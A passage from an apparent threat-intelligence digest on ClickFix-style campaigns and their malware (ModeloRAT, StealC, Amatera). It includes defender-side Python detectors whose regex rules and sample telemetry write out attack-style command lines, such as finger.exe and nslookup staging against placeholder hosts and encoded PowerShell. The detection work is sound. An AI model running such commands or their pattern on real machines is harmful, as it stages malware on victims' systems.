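         MS_GRAPH_RESOURCE_ID, "Microsoft Graph"),
    _rec("2026-02-14T13:42:00Z", "alice@example.com", "Microsoft Azure CLI", "198.51.100.77",
         LEGACY_AAD_GRAPH_RESOURCE_ID, "Windows Azure Active Directory"),
    _rec("2026-02-14T14:05:00Z", "alice@example.com", "Microsoft Azure CLI", "203.0.113.10",
         MS_GRAPH_RESOURCE_ID, "Microsoft Graph"),
    _rec("2026-02-14T15:00:00Z", "bob@example.com", "Microsoft Azure CLI", "198.51.100.77",
         MS_GRAPH_RESOURCE_ID, "Microsoft Graph", error=50126),
    _rec("2026-02-14T16:30:00Z", "alice@example.com", "Microsoft Teams", "198.51.100.50",
         MS_GRAPH_RESOURCE_ID, "Microsoft Graph"),
]


def run_demo() -> list:
    """Baseline on everything before 10 Feb, then evaluate the rest."""
    cutoff = datetime(2026, 2, 10, tzinfo=timezone.utc)
    baseline = build_ip_baseline(SAMPLE_SIGNINS, before=cutoff)
    return detect_cli_anomalies(SAMPLE_SIGNINS, baseline, since=cutoff)


if __name__ == "__main__":
    for alert in run_demo():
        print(alert)
```

Only the sign-in from the unseen address against the legacy Graph resource fires; the same user's Azure CLI session from a baseline address, another user's failed attempt, and a Teams sign-in from a new address are left to other rules. The baseline window and the decision to treat Azure AD Graph as the escalation criterion are both tuning knobs.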
The BitB phishing technique was developed by security researcher mr.d0x in 2022. In a BitB attack, users who visit attacker-controlled webpages are presented with a fake browser pop-up containing a login form. The pop-up is implemented using an iframe that imitates the authentication interface of legitimate platforms and can be customized with a window title and URL that make the deception more difficult to detect. Recent phishing campaigns targeting Facebook users impersonate law firms claiming copyright infringement, threatening imminent account suspension, or Meta security notifications about unauthorized logins. To avoid detection and to increase the sense of legitimacy, cybercriminals added shortened URLs and fake Meta CAPTCHA pages. In the final stage of the attack, victims are prompted to log in by entering their Facebook credentials in a fake pop-up window. Trellix discovered a high number of phishing pages hosted on legitimate cloud platforms like Netlify and Vercel, which mimic Meta's Privacy Center portal, redirecting users to pages disguised as appeal forms that collected personal information. These campaigns constitute a significant evolution compared to standard Facebook phishing campaigns that security researchers typically observe. A new campaign codenamed CrashFix uses a malicious Chrome extension to deliver ModeloRAT via ClickFix-style browser crash lures. The campaign, tracked as KongTuke, uses a malicious Chrome extension named 'NexShield – Advanced Web Guardian' to crash the browser and trick victims into executing commands. The extension masquerades as a legitimate ad blocker and claims to protect users against ads, trackers, malware, and intrusive content. The extension was downloaded at least 5,000 times and is a near-identical clone of uBlock Origin Lite. The extension displays a fake security warning claiming the browser had 'stopped abnormally' and prompts users to run a 'scan'. 
The scan presents a bogus security alert instructing victims to open the Windows Run dialog and execute a command copied to the clipboard. Executing the command causes the browser to freeze and crash by launching a denial-of-service (DoS) attack that creates new runtime port connections through an infinite loop. The extension transmits a unique ID to an attacker-controlled server, allowing operators to track victims. The extension uses a delayed execution mechanism, triggering malicious behavior 60 minutes after installation and then every 10 minutes. The extension incorporates anti-analysis techniques to disable right-click context menus and prevent the use of developer tools. The CrashFix command employs the legitimate Windows utility, finger.exe, to retrieve and execute the next-stage payload from the attacker's server. The payload is a PowerShell command that retrieves a secondary PowerShell script, which uses multiple layers of Base64 encoding and XOR operations to conceal the next-stage malware. The decrypted blob scans running processes for over 50 analysis tools and virtual machine indicators, ceasing execution if found. The script checks if the machine is domain-joined or standalone and sends an HTTP POST request to the server containing a list of installed antivirus products and a flag indicating the machine type. For domain-joined machines, the campaign deploys ModeloRAT, a fully-featured Python-based Windows RAT that uses RC4 encryption for C2 communications. ModeloRAT sets up persistence using Registry and facilitates the execution of binaries, DLLs, Python scripts, and PowerShell commands. ModeloRAT is equipped to update or terminate itself upon receiving specific commands and implements varied beaconing logic to avoid detection. For standalone workstations, the campaign ends with the C2 server responding with a test payload message, indicating it may still be in the testing phase. 
KongTuke's CrashFix campaign demonstrates how threat actors evolve their social engineering tactics by impersonating trusted projects and exploiting user frustration. Huntress attributes the analyzed CrashFix attack to a threat actor named 'KongTuke', whose operations have been on the company's radar since early 2025. Based on the recent discovery, the researchers believe that KongTuke is evolving and becoming more interested in enterprise networks, which are more lucrative for cybercriminals. Falling for ClickFix attacks can be prevented by making sure that the effect of any external command executed on the system is well understood. Furthermore, installing browser extensions only from trusted publishers or sources should protect against CrashFix and similar threats. Users who installed NexShield should perform a full system cleanup, as uninstalling the extension does not remove all payloads, such as ModeloRAT or other malicious scripts.

A separate campaign abuses SyncAppvPublishingServer.vbs, a signed Visual Basic Script associated with App-V, to retrieve and execute an in-memory loader from an external server using wscript.exe. The campaign uses a fake CAPTCHA verification prompt to trick users into pasting and executing a malicious command in the Windows Run dialog. The obfuscated loader runs checks to ensure that it is not running within a sandboxed environment. The loader fetches configuration data from a public Google Calendar (ICS) file, turning a trusted third-party service into a dead drop resolver. The campaign retrieves additional loader stages, including a PowerShell script that functions as an intermediate loader to execute the next stage directly in memory. The resulting script is decrypted, GZip-decompressed in memory, and run using Invoke-Expression, ultimately culminating in the execution of a shellcode loader designed to launch Amatera Stealer.
The campaign targets enterprise-managed systems, as the App-V virtualization solution is built only into the Enterprise and Education editions of Windows 10 and Windows 11, along with modern Windows Server versions. The campaign is highly sophisticated and evasive, using in-memory PowerShell code execution and relying on blockchain and popular CDNs to avoid communicating with any infrastructure that is not a legitimate service. The campaign uses a multi-stage attack chain that includes a fake CAPTCHA verification prompt, abuse of SyncAppvPublishingServer.vbs, and retrieval of configuration data from a public Google Calendar file. The campaign is part of the broader fake CAPTCHA ecosystem, which uses trusted web infrastructure as the delivery surface, with Cloudflare-style challenges acting as a conduit for clipboard-driven execution of PowerShell commands, VB Scripts, MSI installers, and browser-native frameworks like Matrix Push C2.

**New Development:** Microsoft has disclosed a DNS-based ClickFix variant that uses the `nslookup` command to stage payloads via DNS queries, retrieving a second-stage payload from a hard-coded DNS server. This attack chain downloads a ZIP archive from `azwsappdev[.]com`, extracts a Python script for reconnaissance, and deploys **ModeloRAT** via a VBScript, with persistence established through an LNK file in the Windows Startup folder. Concurrently, Bitdefender reports a surge in **Lumma Stealer** activity driven by ClickFix-style campaigns deploying **CastleLoader**, an AutoIt-based loader that evades detection by checking for virtualization and security tools. Lumma Stealer infections are geolocated primarily in India, France, and the U.S. The article also details macOS-focused ClickFix campaigns delivering **Odyssey Stealer** (a Poseidon Stealer rebrand) and **ClearFake** campaigns leveraging EtherHiding via BNB Smart Chain to fetch payloads.
The evolution of ClickFix now includes DNS-based staging, expanded loader integration, and cross-platform targeting, demonstrating resilience despite 2025 law enforcement disruptions.
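A defender-side example added here (not code from Microsoft, Huntress, Trellix, or any of the cited reports): it scores constructed process-creation events for the ClickFix execution patterns described in the timeline above, namely a shell spawned from explorer.exe (Run dialog or File Explorer address bar), finger.exe used as a downloader, wscript.exe running SyncAppvPublishingServer.vbs, nslookup staging against an explicit server, and encoded or self-evaluating PowerShell one-liners. All hostnames, IPs, the script argument and the encoded blob are placeholders, and the sample telemetry is constructed.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """One process-creation record in Sysmon EID 1 / Security 4688 style."""
    parent: str   # parent image file name, e.g. "explorer.exe"
    image: str    # created process image file name
    cmdline: str  # full command line of the created process


@dataclass(frozen=True)
class Finding:
    rule: str
    score: int
    cmdline: str


# Interpreters a victim is told to launch from the Run dialog (ClickFix) or the
# File Explorer address bar (FileFix); explorer.exe is the parent in both cases.
USER_SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
               "cscript.exe", "mshta.exe"}

# (rule name, base score, image pattern, command-line pattern), case-insensitive.
RULES = [
    # finger.exe used as a downloader (CrashFix): "finger <user>@<host>"
    ("finger_downloader", 70,
     r"^(finger|cmd|powershell|pwsh)\.exe$",
     r"\bfinger(\.exe)?\s+\S+@\S+"),
    # signed App-V script run through the script host to pull an in-memory loader
    ("syncappv_script_abuse", 70,
     r"^(wscript|cscript)\.exe$",
     r"SyncAppvPublishingServer\.vbs"),
    # nslookup with an explicit, hard-coded server argument (DNS staging variant)
    ("nslookup_staging", 50,
     r"^(nslookup|cmd|powershell|pwsh)\.exe$",
     r"\bnslookup(\.exe)?\s+(-q(uery)?=\w+\s+)?\S+\s+\d{1,3}(\.\d{1,3}){3}\b"),
    # PowerShell one-liners that decode, or fetch and evaluate, further stages
    ("ps_inline_fetch_or_decode", 50,
     r"^(powershell|pwsh)\.exe$",
     r"(-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{40,}|\biex\b|Invoke-Expression"
     r"|DownloadString|FromBase64String)"),
]
_COMPILED = [(n, s, re.compile(i, re.I), re.compile(c, re.I))
             for n, s, i, c in RULES]
_NET_OR_EVAL = re.compile(r"\b(http|ftp)s?://|\biex\b|-nop\b", re.I)


def score_event(ev: ProcEvent) -> list[Finding]:
    """Return every rule the event matches; explorer.exe parentage adds 30."""
    findings = []
    from_user_shell = (ev.parent.lower() == "explorer.exe"
                       and ev.image.lower() in USER_SHELLS)
    bonus = 30 if from_user_shell else 0
    for name, score, img_re, cmd_re in _COMPILED:
        if img_re.search(ev.image) and cmd_re.search(ev.cmdline):
            findings.append(Finding(name, score + bonus, ev.cmdline))
    # Weaker catch-all: a shell launched from explorer.exe whose command line
    # already names a URL or evaluates code, even if no specific rule fired.
    if not findings and from_user_shell and _NET_OR_EVAL.search(ev.cmdline):
        findings.append(Finding("explorer_spawned_shell_with_network_or_eval",
                                40, ev.cmdline))
    return findings


def triage(events: list[ProcEvent]) -> dict[int, int]:
    """Map event index -> highest matching score, omitting clean events."""
    out = {}
    for i, ev in enumerate(events):
        hits = score_event(ev)
        if hits:
            out[i] = max(h.score for h in hits)
    return out


# Constructed sample telemetry; hosts, IPs and the encoded blob are placeholders.
SAMPLE_EVENTS = [
    ProcEvent("explorer.exe", "cmd.exe",
              "cmd.exe /c finger stage@placeholder.invalid"),
    ProcEvent("explorer.exe", "wscript.exe",
              "wscript.exe C:\\Windows\\System32\\SyncAppvPublishingServer.vbs "
              "\"<PLACEHOLDER_ARGUMENT>\""),
    ProcEvent("explorer.exe", "cmd.exe",
              "cmd.exe /c nslookup -q=txt stage.placeholder.invalid 203.0.113.5"),
    ProcEvent("explorer.exe", "powershell.exe",
              "powershell.exe -nop -w hidden -enc " + "A" * 44),
    # benign activity that must not fire
    ProcEvent("explorer.exe", "powershell.exe", "powershell.exe"),
    ProcEvent("svchost.exe", "nslookup.exe", "nslookup www.example.com"),
    ProcEvent("services.exe", "wscript.exe", "wscript.exe C:\\scripts\\backup.vbs"),
]


if __name__ == "__main__":
    for idx, score in triage(SAMPLE_EVENTS).items():
        print(f"event {idx}: score {score}")
        for h in score_event(SAMPLE_EVENTS[idx]):
            print(f"  {h.rule} -> {h.cmdline}")
```

The explorer.exe bonus is what separates a typed ClickFix/FileFix command from the same tooling launched by a scheduled task or management agent, so tune it against your own baseline of admin activity before alerting on it.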
Sources:
- Cybercriminals Deploy CORNFLAKE.V3 Backdoor via ClickFix Tactic and Fake CAPTCHA Pages — thehackernews.com — 21.08.2025 19:25
- From ClickFix to MetaStealer: Dissecting Evolving Threat Actor Techniques — www.bleepingcomputer.com — 17.09.2025 17:01
- ClickFix malware attacks evolve with multi-OS support, video tutorials — www.bleepingcomputer.com — 06.11.2025 16:00
- Decades-old ‘Finger’ protocol abused in ClickFix malware attacks — www.bleepingcomputer.com — 15.11.2025 20:46
- New EVALUSION ClickFix Campaign Delivers Amatera Stealer and NetSupport RAT — thehackernews.com — 17.11.2025 18:53
- ClickFix attack uses fake Windows Update screen to push malware — www.bleepingcomputer.com — 24.11.2025 22:42
- JackFix Uses Fake Windows Update Pop-Ups on Adult Sites to Deliver Multiple Stealers — thehackernews.com — 25.11.2025 16:18
- Ransomware IAB abuses EDR for stealthy malware execution — www.bleepingcomputer.com — 09.12.2025 17:24
- New ConsentFix attack hijacks Microsoft accounts via Azure CLI — www.bleepingcomputer.com — 11.12.2025 17:10
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- Phishing Scams Exploit Browser-in-the-Browser Attacks to Steal Facebook Passwords — www.infosecurity-magazine.com — 13.01.2026 16:40
- CrashFix Chrome Extension Delivers ModeloRAT Using ClickFix-Style Browser Crash Lures — thehackernews.com — 19.01.2026 11:09
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
- Microsoft Discloses DNS-Based ClickFix Attack Using Nslookup for Malware Staging — thehackernews.com — 15.02.2026 16:10
Information Snippets
- UNC5518 uses ClickFix to deploy the CORNFLAKE.V3 backdoor via fake CAPTCHA pages and malicious PowerShell scripts.
  First reported: 21.08.2025 19:25 · 3 sources, 9 articles. Sources:
- Cybercriminals Deploy CORNFLAKE.V3 Backdoor via ClickFix Tactic and Fake CAPTCHA Pages — thehackernews.com — 21.08.2025 19:25
- Innovative FileFix Phishing Attack Proves Plenty Potent — www.darkreading.com — 16.09.2025 15:00
- New FileFix Variant Delivers StealC Malware Through Multilingual Phishing Site — thehackernews.com — 16.09.2025 15:33
- From ClickFix to MetaStealer: Dissecting Evolving Threat Actor Techniques — www.bleepingcomputer.com — 17.09.2025 17:01
- ClickFix malware attacks evolve with multi-OS support, video tutorials — www.bleepingcomputer.com — 06.11.2025 16:00
- Decades-old ‘Finger’ protocol abused in ClickFix malware attacks — www.bleepingcomputer.com — 15.11.2025 20:46
- ClickFix attack uses fake Windows Update screen to push malware — www.bleepingcomputer.com — 24.11.2025 22:42
- Ransomware IAB abuses EDR for stealthy malware execution — www.bleepingcomputer.com — 09.12.2025 17:24
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
- The initial infection vector involves tricking users into executing a PowerShell script via the Windows Run dialog.
  First reported: 21.08.2025 19:25 · 3 sources, 12 articles. Sources:
- Cybercriminals Deploy CORNFLAKE.V3 Backdoor via ClickFix Tactic and Fake CAPTCHA Pages — thehackernews.com — 21.08.2025 19:25
- Innovative FileFix Phishing Attack Proves Plenty Potent — www.darkreading.com — 16.09.2025 15:00
- New FileFix Variant Delivers StealC Malware Through Multilingual Phishing Site — thehackernews.com — 16.09.2025 15:33
- From ClickFix to MetaStealer: Dissecting Evolving Threat Actor Techniques — www.bleepingcomputer.com — 17.09.2025 17:01
- ClickFix malware attacks evolve with multi-OS support, video tutorials — www.bleepingcomputer.com — 06.11.2025 16:00
- New EVALUSION ClickFix Campaign Delivers Amatera Stealer and NetSupport RAT — thehackernews.com — 17.11.2025 18:53
- ClickFix attack uses fake Windows Update screen to push malware — www.bleepingcomputer.com — 24.11.2025 22:42
- Ransomware IAB abuses EDR for stealthy malware execution — www.bleepingcomputer.com — 09.12.2025 17:24
- New ConsentFix attack hijacks Microsoft accounts via Azure CLI — www.bleepingcomputer.com — 11.12.2025 17:10
- CrashFix Chrome Extension Delivers ModeloRAT Using ClickFix-Style Browser Crash Lures — thehackernews.com — 19.01.2026 11:09
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
- Microsoft Discloses DNS-Based ClickFix Attack Using Nslookup for Malware Staging — thehackernews.com — 15.02.2026 16:10
- UNC5774 and UNC4108 leverage the access provided by UNC5518 to deploy additional payloads.
  First reported: 21.08.2025 19:25 · 3 sources, 7 articles. Sources:
- Cybercriminals Deploy CORNFLAKE.V3 Backdoor via ClickFix Tactic and Fake CAPTCHA Pages — thehackernews.com — 21.08.2025 19:25
- Innovative FileFix Phishing Attack Proves Plenty Potent — www.darkreading.com — 16.09.2025 15:00
- New FileFix Variant Delivers StealC Malware Through Multilingual Phishing Site — thehackernews.com — 16.09.2025 15:33
- From ClickFix to MetaStealer: Dissecting Evolving Threat Actor Techniques — www.bleepingcomputer.com — 17.09.2025 17:01
- ClickFix attack uses fake Windows Update screen to push malware — www.bleepingcomputer.com — 24.11.2025 22:42
- Ransomware IAB abuses EDR for stealthy malware execution — www.bleepingcomputer.com — 09.12.2025 17:24
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
- CORNFLAKE.V3 supports the execution of various payload types, including executables, DLLs, JavaScript files, batch scripts, and PowerShell commands.
  First reported: 21.08.2025 19:25 · 3 sources, 7 articles. Sources:
- Cybercriminals Deploy CORNFLAKE.V3 Backdoor via ClickFix Tactic and Fake CAPTCHA Pages — thehackernews.com — 21.08.2025 19:25
- Innovative FileFix Phishing Attack Proves Plenty Potent — www.darkreading.com — 16.09.2025 15:00
- New FileFix Variant Delivers StealC Malware Through Multilingual Phishing Site — thehackernews.com — 16.09.2025 15:33
- From ClickFix to MetaStealer: Dissecting Evolving Threat Actor Techniques — www.bleepingcomputer.com — 17.09.2025 17:01
- ClickFix attack uses fake Windows Update screen to push malware — www.bleepingcomputer.com — 24.11.2025 22:42
- Ransomware IAB abuses EDR for stealthy malware execution — www.bleepingcomputer.com — 09.12.2025 17:24
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
- CORNFLAKE.V3 collects system information and transmits it via Cloudflare tunnels to evade detection.
  First reported: 21.08.2025 19:25 · 3 sources, 7 articles. Sources:
- Cybercriminals Deploy CORNFLAKE.V3 Backdoor via ClickFix Tactic and Fake CAPTCHA Pages — thehackernews.com — 21.08.2025 19:25
- Innovative FileFix Phishing Attack Proves Plenty Potent — www.darkreading.com — 16.09.2025 15:00
- New FileFix Variant Delivers StealC Malware Through Multilingual Phishing Site — thehackernews.com — 16.09.2025 15:33
- From ClickFix to MetaStealer: Dissecting Evolving Threat Actor Techniques — www.bleepingcomputer.com — 17.09.2025 17:01
- ClickFix attack uses fake Windows Update screen to push malware — www.bleepingcomputer.com — 24.11.2025 22:42
- Ransomware IAB abuses EDR for stealthy malware execution — www.bleepingcomputer.com — 09.12.2025 17:24
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
- CORNFLAKE.V3 features host persistence via a registry Run key and supports additional payload types compared to its predecessor, CORNFLAKE.V2.
  First reported: 21.08.2025 19:25 · 3 sources, 7 articles. Sources:
- Cybercriminals Deploy CORNFLAKE.V3 Backdoor via ClickFix Tactic and Fake CAPTCHA Pages — thehackernews.com — 21.08.2025 19:25
- Innovative FileFix Phishing Attack Proves Plenty Potent — www.darkreading.com — 16.09.2025 15:00
- New FileFix Variant Delivers StealC Malware Through Multilingual Phishing Site — thehackernews.com — 16.09.2025 15:33
- From ClickFix to MetaStealer: Dissecting Evolving Threat Actor Techniques — www.bleepingcomputer.com — 17.09.2025 17:01
- ClickFix attack uses fake Windows Update screen to push malware — www.bleepingcomputer.com — 24.11.2025 22:42
- Ransomware IAB abuses EDR for stealthy malware execution — www.bleepingcomputer.com — 09.12.2025 17:24
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
- WINDYTWIST.SEA, a C version of WINDYTWIST, supports lateral movement within infected networks.
  First reported: 21.08.2025 19:25 · 3 sources, 7 articles. Sources:
- Cybercriminals Deploy CORNFLAKE.V3 Backdoor via ClickFix Tactic and Fake CAPTCHA Pages — thehackernews.com — 21.08.2025 19:25
- Innovative FileFix Phishing Attack Proves Plenty Potent — www.darkreading.com — 16.09.2025 15:00
- New FileFix Variant Delivers StealC Malware Through Multilingual Phishing Site — thehackernews.com — 16.09.2025 15:33
- From ClickFix to MetaStealer: Dissecting Evolving Threat Actor Techniques — www.bleepingcomputer.com — 17.09.2025 17:01
- ClickFix attack uses fake Windows Update screen to push malware — www.bleepingcomputer.com — 24.11.2025 22:42
- Ransomware IAB abuses EDR for stealthy malware execution — www.bleepingcomputer.com — 09.12.2025 17:24
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
- The FileFix attack is a new variant of the ClickFix family of attacks.
  First reported: 16.09.2025 15:00 · 3 sources, 7 articles. Sources:
- New FileFix attack uses steganography to drop StealC malware — www.bleepingcomputer.com — 16.09.2025 15:00
- Innovative FileFix Phishing Attack Proves Plenty Potent — www.darkreading.com — 16.09.2025 15:00
- New FileFix Variant Delivers StealC Malware Through Multilingual Phishing Site — thehackernews.com — 16.09.2025 15:33
- From ClickFix to MetaStealer: Dissecting Evolving Threat Actor Techniques — www.bleepingcomputer.com — 17.09.2025 17:01
- ClickFix malware attacks evolve with multi-OS support, video tutorials — www.bleepingcomputer.com — 06.11.2025 16:00
- Ransomware IAB abuses EDR for stealthy malware execution — www.bleepingcomputer.com — 09.12.2025 17:24
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
- FileFix uses the address bar in File Explorer to execute malicious commands.
  First reported: 16.09.2025 15:00 · 3 sources, 7 articles. Sources:
- New FileFix attack uses steganography to drop StealC malware — www.bleepingcomputer.com — 16.09.2025 15:00
- Innovative FileFix Phishing Attack Proves Plenty Potent — www.darkreading.com — 16.09.2025 15:00
- New FileFix Variant Delivers StealC Malware Through Multilingual Phishing Site — thehackernews.com — 16.09.2025 15:33
- From ClickFix to MetaStealer: Dissecting Evolving Threat Actor Techniques — www.bleepingcomputer.com — 17.09.2025 17:01
- Ransomware IAB abuses EDR for stealthy malware execution — www.bleepingcomputer.com — 09.12.2025 17:24
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
- The FileFix technique was created by red team researcher mr.d0x.
  First reported: 16.09.2025 15:00 · 3 sources, 8 articles. Sources:
- New FileFix attack uses steganography to drop StealC malware — www.bleepingcomputer.com — 16.09.2025 15:00
- Innovative FileFix Phishing Attack Proves Plenty Potent — www.darkreading.com — 16.09.2025 15:00
- New FileFix Variant Delivers StealC Malware Through Multilingual Phishing Site — thehackernews.com — 16.09.2025 15:33
- From ClickFix to MetaStealer: Dissecting Evolving Threat Actor Techniques — www.bleepingcomputer.com — 17.09.2025 17:01
- ClickFix malware attacks evolve with multi-OS support, video tutorials — www.bleepingcomputer.com — 06.11.2025 16:00
- Ransomware IAB abuses EDR for stealthy malware execution — www.bleepingcomputer.com — 09.12.2025 17:24
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
- The new FileFix campaign impersonates Meta account suspension warnings.
  First reported: 16.09.2025 15:00 · 3 sources, 8 articles. Sources:
- New FileFix attack uses steganography to drop StealC malware — www.bleepingcomputer.com — 16.09.2025 15:00
- Innovative FileFix Phishing Attack Proves Plenty Potent — www.darkreading.com — 16.09.2025 15:00
- New FileFix Variant Delivers StealC Malware Through Multilingual Phishing Site — thehackernews.com — 16.09.2025 15:33
- From ClickFix to MetaStealer: Dissecting Evolving Threat Actor Techniques — www.bleepingcomputer.com — 17.09.2025 17:01
- ClickFix malware attacks evolve with multi-OS support, video tutorials — www.bleepingcomputer.com — 06.11.2025 16:00
- Ransomware IAB abuses EDR for stealthy malware execution — www.bleepingcomputer.com — 09.12.2025 17:24
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
- The FileFix campaign uses a multi-language phishing page to trick users.
  First reported: 16.09.2025 15:00 · 3 sources, 8 articles. Sources:
- New FileFix attack uses steganography to drop StealC malware — www.bleepingcomputer.com — 16.09.2025 15:00
- Innovative FileFix Phishing Attack Proves Plenty Potent — www.darkreading.com — 16.09.2025 15:00
- New FileFix Variant Delivers StealC Malware Through Multilingual Phishing Site — thehackernews.com — 16.09.2025 15:33
- From ClickFix to MetaStealer: Dissecting Evolving Threat Actor Techniques — www.bleepingcomputer.com — 17.09.2025 17:01
- ClickFix malware attacks evolve with multi-OS support, video tutorials — www.bleepingcomputer.com — 06.11.2025 16:00
- Ransomware IAB abuses EDR for stealthy malware execution — www.bleepingcomputer.com — 09.12.2025 17:24
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
- The campaign disguises a PowerShell command as a file path to install malware.
  First reported: 16.09.2025 15:00 · 3 sources, 8 articles. Sources:
- New FileFix attack uses steganography to drop StealC malware — www.bleepingcomputer.com — 16.09.2025 15:00
- Innovative FileFix Phishing Attack Proves Plenty Potent — www.darkreading.com — 16.09.2025 15:00
- New FileFix Variant Delivers StealC Malware Through Multilingual Phishing Site — thehackernews.com — 16.09.2025 15:33
- From ClickFix to MetaStealer: Dissecting Evolving Threat Actor Techniques — www.bleepingcomputer.com — 17.09.2025 17:01
- ClickFix malware attacks evolve with multi-OS support, video tutorials — www.bleepingcomputer.com — 06.11.2025 16:00
- Ransomware IAB abuses EDR for stealthy malware execution — www.bleepingcomputer.com — 09.12.2025 17:24
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
- The FileFix campaign uses steganography to hide a second-stage PowerShell script and encrypted executables inside a JPG image.
  First reported: 16.09.2025 15:00 · 3 sources, 8 articles. Sources:
- New FileFix attack uses steganography to drop StealC malware — www.bleepingcomputer.com — 16.09.2025 15:00
- Innovative FileFix Phishing Attack Proves Plenty Potent — www.darkreading.com — 16.09.2025 15:00
- New FileFix Variant Delivers StealC Malware Through Multilingual Phishing Site — thehackernews.com — 16.09.2025 15:33
- From ClickFix to MetaStealer: Dissecting Evolving Threat Actor Techniques — www.bleepingcomputer.com — 17.09.2025 17:01
- ClickFix malware attacks evolve with multi-OS support, video tutorials — www.bleepingcomputer.com — 06.11.2025 16:00
- Ransomware IAB abuses EDR for stealthy malware execution — www.bleepingcomputer.com — 09.12.2025 17:24
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
- The final payload in the FileFix campaign is the StealC infostealer malware.
  First reported: 16.09.2025 15:00 · 4 sources, 9 articles. Sources:
- New FileFix attack uses steganography to drop StealC malware — www.bleepingcomputer.com — 16.09.2025 15:00
- Innovative FileFix Phishing Attack Proves Plenty Potent — www.darkreading.com — 16.09.2025 15:00
- New FileFix Variant Delivers StealC Malware Through Multilingual Phishing Site — thehackernews.com — 16.09.2025 15:33
- From ClickFix to MetaStealer: Dissecting Evolving Threat Actor Techniques — www.bleepingcomputer.com — 17.09.2025 17:01
- ClickFix malware attacks evolve with multi-OS support, video tutorials — www.bleepingcomputer.com — 06.11.2025 16:00
- Russian-linked Malware Campaign Hides in Blender 3D Files — www.infosecurity-magazine.com — 24.11.2025 16:00
- Ransomware IAB abuses EDR for stealthy malware execution — www.bleepingcomputer.com — 09.12.2025 17:24
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
- StealC targets credentials from web browsers, messaging apps, cryptocurrency wallets, cloud credentials, VPN and gaming apps, and can take screenshots of the active desktop.
  First reported: 16.09.2025 15:00 · 4 sources, 9 articles. Sources:
- New FileFix attack uses steganography to drop StealC malware — www.bleepingcomputer.com — 16.09.2025 15:00
- Innovative FileFix Phishing Attack Proves Plenty Potent — www.darkreading.com — 16.09.2025 15:00
- New FileFix Variant Delivers StealC Malware Through Multilingual Phishing Site — thehackernews.com — 16.09.2025 15:33
- From ClickFix to MetaStealer: Dissecting Evolving Threat Actor Techniques — www.bleepingcomputer.com — 17.09.2025 17:01
- ClickFix malware attacks evolve with multi-OS support, video tutorials — www.bleepingcomputer.com — 06.11.2025 16:00
- Russian-linked Malware Campaign Hides in Blender 3D Files — www.infosecurity-magazine.com — 24.11.2025 16:00
- Ransomware IAB abuses EDR for stealthy malware execution — www.bleepingcomputer.com — 09.12.2025 17:24
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
- ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services — thehackernews.com — 27.01.2026 16:38
- The FileFix campaign has evolved over two weeks with different payloads, domains, and lures.
  First reported: 16.09.2025 15:00 · 3 sources, 8 articles. Sources:
- New FileFix attack uses steganography to drop StealC malware — www.bleepingcomputer.com — 16.09.2025 15:00
- Innovative FileFix Phishing Attack Proves Plenty Potent — www.darkreading.com — 16.09.2025 15:00
- New FileFix Variant Delivers StealC Malware Through Multilingual Phishing Site — thehackernews.com — 16.09.2025 15:33
- From ClickFix to MetaStealer: Dissecting Evolving Threat Actor Techniques — www.bleepingcomputer.com — 17.09.2025 17:01
- ClickFix malware attacks evolve with multi-OS support, video tutorials — www.bleepingcomputer.com — 06.11.2025 16:00
- Ransomware IAB abuses EDR for stealthy malware execution — www.bleepingcomputer.com — 09.12.2025 17:24
- Facebook login thieves now using browser-in-browser trick — www.bleepingcomputer.com — 12.01.2026 23:05
